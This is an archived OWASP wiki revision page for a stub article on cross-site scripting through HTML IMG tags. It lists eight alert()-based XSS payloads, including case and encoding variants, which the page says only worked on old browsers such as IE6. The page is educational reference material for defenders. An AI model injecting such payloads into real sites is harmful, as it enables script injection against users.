This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Script in IMG tags"
(fixup sentence) |
(Add positive test result) |
||
| Line 1: | Line 1: | ||
==Description== | ==Description== | ||
| − | It is possible for an attacker to execute JavaScript via HTML IMG tags. This is also referred to as XSS (Cross-Site Scripting). However, this type of attack is no longer possible on modern browsers. | + | It is possible for an attacker to execute JavaScript via HTML IMG tags. This is also referred to as XSS (Cross-Site Scripting). However, this type of attack is no longer possible on modern browsers. It has been tested as working on Internet Explorer (IE) 6 running on Windows XP. |
==Examples == | ==Examples == | ||
Latest revision as of 13:11, 19 May 2015
Description
It is possible for an attacker to execute JavaScript via HTML IMG tags. This is also referred to as XSS (Cross-Site Scripting). However, this type of attack is no longer possible on modern browsers. It has been tested as working on Internet Explorer (IE) 6 running on Windows XP.
Examples
The following are methods an attacker can use in order to execute Javascript but will not be effective against modern browsers.
<IMG SRC="javascript:alert('Vulnerable');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says,
'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG
SRC=javascript:alert('XSS')>
Related Threats
Related Attacks
Related Vulnerabilities
Related Countermeasures
Categories
This article is a stub. You can help OWASP by expanding it or discussing it on its Talk page.
